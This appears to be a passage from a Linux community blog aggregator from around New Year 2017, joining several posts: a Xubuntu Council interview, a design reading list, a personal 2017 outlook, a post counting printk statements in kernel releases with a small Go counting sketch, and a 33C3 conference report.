Simon: When Dapper Drake saw the light of day 10 years ago (I know, it’s incredible – it’s been a decade!) and I started using Linux, my first choice was – and this has never changed – Xfce and Ubuntu. At first I never thought I would be fit to contribute, but the warm welcome from the amazing community around these projects pulled me in.

Pasi: When I converted from Windows to Linux for good in 2006, I started contributing to the Amarok project, my media player of choice back then. A few years later my contributions there slowed down, and it felt like a natural step to start working with the operating system I was using.

Can you share some thoughts about the future of Xubuntu?

Sean: Xubuntu has always taken a conservative approach to the desktop. It includes simple, effective applications on top of a traditional desktop. That said, the technologies that Xubuntu is built on (GTK+, GStreamer, Xfce, and many many others) are undergoing significant changes, and we’re always looking to improve. I think we’ll continue to see improvements that will welcome new users and please our longtime fans.

Simon: Change is hard for many people; however, based on a recent psych test I am “surprisingly optimistic” :) While Xubuntu – and this is heritage from Xfce – has what many would call a “conservative” approach, I believe we can still improve the current experience by quite a bit. I don’t mean this change has to be radical, but it should be more than just “repainting the walls”. This is why I personally welcome the changes in GTK+ and why I believe our future is bright.

Pasi: As Sean mentioned, we will be seeing changes in Xubuntu as a consequence of the underlying technologies and components – whether we like them or not. To be part of the decision making, and to ensure that Xubuntu can and will feel as integrated and polished as it does now, it’s important to stay involved with the migration work. While this will mean fewer resources to put into Xubuntu-specific work in the near future, I believe it leads us to a better place later.

So that people can get to know you a bit better, is there an interesting fact about yourself that you wish to share?

Sean: Two unrelated things: I’m also an Xfce developer and one of my current life goals is to visit Japan (and maybe one day live there).

Simon: My background is a bit atypical: my two majors at University were Philosophy and Comparative Religious Studies.

Pasi: In addition to contributing to open source, I use my free time to play modern board games. I have about 75 of them in my office closet.

Further questions?

If you have any questions about the council, please don’t hesitate to ask! You can contact us by joining the IRC channel #xubuntu-devel on freenode or by joining the Xubuntu-devel mailing list.

Additionally, if this sparked your interest to get involved, be in touch with anybody from the Xubuntu team. There are a lot of things to do and all kinds of skills are useful. Maybe someday you might even become a Xubuntu Council member!

on January 01, 2017 04:43 PM

December’s reading list

Canonical Design Team

We hope everyone has had a great start to the year and fun holiday season. Here are the best links shared by the design team during the last month of 2016:

  1. Creating a Weekly Research Cadence
  2. We’ve updated the radios and checkboxes on GOV.UK
  3. A new algorithm for finding a visual center of a polygon
  4. Mockuuups Studio – Product mockups, made easy & instantly
  5. Retiring pieces of a design system
  6. Yes, progressive enhancement is a f*cking moral argument
  7. Space in Design Systems
  8. BBC GEL: Design Patterns
  9. Interview / Mark Boardman (StreetView Project)
  10. Dan Ariely: What makes us feel good about our work?

Thank you to Anthony, Grazina, Jamie, Karl and me for the links this month!

on January 01, 2017 09:03 AM

Staring Ahead At 2017

Stephen Michael Kellat

2016 was not the best of years. While my parents have told me that it wasn't a bad year, my "log line" for the year was that this was the year I was under investigation, threat assessment, and who knows what other official review. These things kinda happen when you work in the civil service of a president who sometimes thinks he is a Stuart monarch and, even worse, acts like one from time to time.

Tonight I spent some time playing with a software-defined radio. A project in 2017 is to set up an automated recorder out in the garage to monitor the CBC Radio One outlet that is audible from the other side of Lake Erie in southwest Ontario. Right now there is a bit of a noise problem to overcome with some antenna construction; as the waterfall display below shows, I can barely even hear the local outlet of NOAA Weather Radio (KEC58) out in Erie, Pennsylvania amidst some broad-spectrum noise shown in yellow:

Seeking the station at 162.400 MHz

Even though it isn't funded, I'm still looking at the Outernet research project. By way of Joey Hess over in the pump.io spaces, I see I'm not the only one thinking about them either, as there was a presentation at 33c3. Eventually I'll need to watch that.

I will note, contra David Tomaschik, that disclosure of employee information that is available under the Freedom of Information Act isn't really a hack. In general you can request that directory information from any federal agency, including DHS and the FBI. The FOIA micro-site created by the US Department of Justice can help in drafting your own inquiries.

The folks at the Ubuntu Podcast had an opportunity to prognosticate about the future. With the storm and stress of my civil service post, I frankly forgot to chip in. This happens increasingly often. Since I used to be an Ubuntu-related podcaster, I can offer some prognostication.

My guesses for 2017 include:

  • I may not be a federal civil servant by the end of 2017. It probably won't be by my choice based upon the views of the incoming administration.
  • 2017 will be the Year of Xubuntu.
  • Laura Cowen will finish her PhD.
  • Lubuntu will be subsumed into the Kubuntu project as a light version of Kubuntu.
  • There will be a steep contraction in the number of Ubuntu derivatives.
  • James Cameron will retcon the Terminator franchise once again, this time renaming Skynet to Mirai.
  • The United States will lose a significant portion of its consumer broadband access. The rest of the world won't notice.
  • I may celebrate New Year's Eve 2017 well outside the Continental United States and quite possibly outside US jurisdiction.

To all a happy new year. We have work to do.

on January 01, 2017 04:21 AM

December 31, 2016

The kernel contains tens of thousands of statements that may print various errors, warnings and debug/information messages to the kernel log.  Unsurprisingly, as the kernel grows in size, so does the quantity of these messages.  I've been scraping the kernel source for printk-style statements and macros and scanning these for typos and spelling mistakes. To make this easier, I hacked up kernelscan (a quick and dirty parser) that finds literal strings in the kernel for spell checking.
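kernelscan itself is a dedicated parser; purely to illustrate the idea, a much-simplified counter might look like the sketch below (the regex heuristic is my assumption for illustration, not the tool's actual matching):

package main

import (
	"bufio"
	"fmt"
	"log"
	"os"
	"path/filepath"
	"regexp"
	"strings"
)

// Heuristic match for common printk-style calls; the real tool parses properly.
var printkRE = regexp.MustCompile(`\b(printk|pr_(emerg|alert|crit|err|warn|notice|info|debug)|dev_(err|warn|info|dbg))\s*\(`)

func main() {
	if len(os.Args) != 2 {
		log.Fatalf("usage: %s <kernel-source-tree>", os.Args[0])
	}
	count := 0
	err := filepath.Walk(os.Args[1], func(path string, info os.FileInfo, err error) error {
		// Skip unreadable entries, directories, and non-C files.
		if err != nil || info.IsDir() || !strings.HasSuffix(path, ".c") {
			return nil
		}
		f, err := os.Open(path)
		if err != nil {
			return nil
		}
		defer f.Close()
		scanner := bufio.NewScanner(f)
		for scanner.Scan() {
			count += len(printkRE.FindAllString(scanner.Text(), -1))
		}
		return nil
	})
	if err != nil {
		log.Fatal(err)
	}
	fmt.Printf("printk-style statements found: %d\n", count)
}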

Using kernelscan, I've gathered some statistics for the number of kernel print statements for various kernel releases:

[Chart: number of printk-style messages per kernel release]
As one can see, we have over 200,000 messages in the 4.9 kernel(!).  This growth seems to roughly correlate with the kernel source size:

[Chart: kernel source size per release]
So how many lines of kernel code do we have per printk message over time?

[Chart: lines of kernel code per printk message over time]
...showing that the trend is more lines of code per printk statement over time.  I didn't differentiate between the different types of printk message, so it is hard to see any deeper trends in what kinds of messages are being logged more or less frequently in each release; for example, perhaps fewer debug messages are landing in the kernel nowadays.

I find it quite amazing that the kernel contains so many printk messages; it would be useful to see just how many of these are actually in a production kernel. I suspect quite a large number are for driver debugging and may be conditionally omitted at build time.
on December 31, 2016 06:20 PM

December 30, 2016

33C3: Works for me

Sebastian Kügler

Rocket Science
The calm days between Christmas and New Year are best celebrated with your family (of choice), so I went to Hamburg, where the 33rd edition of the Chaos Communication Congress opened its doors to 12,000 hackers, civil rights activists, makers and people interested in privacy and computer security. The motto of this congress is “works for me”, which is meant as a critical nudge towards developers who stop once technology works for them, while it should work for everyone. A demand for a change in attitude.

33C3’s ballroom

The congress is a huge gathering of people to share information, hack, talk and party, and the past days have been a blast. This congress strikes an excellent balance between high-quality talks, interesting hacks and electronics, and a laid-back atmosphere, almost around the clock. (Well, the official track stops around 2 a.m., but continues around half past eleven in the morning.) The schedule is really relaxed, which makes it possible to party at night and interrupt dancing for a quick presentation about colonizing intergalactic space, given by domain experts.

The conference also has a large unconference part, hacking spaces, and lounge areas, meaning that the setup is somewhere in between a technology conference, a large hack-fest and a techno party. Everything is filled to the brim with electronics and decorated nicely, and after a few days, the outside world simply starts to fade and “congress” becomes the new reality.

No Love for the U.S. Gov

I’ve attended a bunch of sessions on civil rights and cyber warfare, as well as more technical topics. One presentation that touched me in particular was the story of Lauri Love, who is accused of stealing data from agencies including the Federal Reserve, NASA and the FBI. The talk was presented by a civil rights activist from the Courage Foundation and two hackers from Anonymous and LulzSec. While Love is a UK citizen, the US is demanding extradition from the UK so they can prosecute him under US law (which is much stricter than the UK’s). This would set a precedent, making it much easier for the US to prosecute citizens anywhere under US law.

What kind of technoparty^W congress is this?
This, combined with the US jail system, poses a serious threat to Love. He wouldn’t be the first person driven to suicide by the pressure put on him by US government agencies, who really seem to be playing hardball here. Chelsea Manning, the whistleblower behind the videos of the Baghdad airstrikes in which the US Air Force carelessly killed innocent citizens, suffered from mental health issues and was put into solitary confinement instead of receiving health care. Against that background, the UK would be sending one of its own citizens into a jail system that doesn’t even respect basic human rights. One particularly touching moment was when the brother of Aaron Swartz took the microphone and appealed to the people asking how they could prevent another Aaron: helping Lauri (and Chelsea) is the way to help out, and that’s where the energy should be put. Very moving.

The media team at this event is recording most of the sessions, so if you have some time to spare, head over to media.ccc.de and get your fix. See you at 34C3!

on December 30, 2016 12:26 PM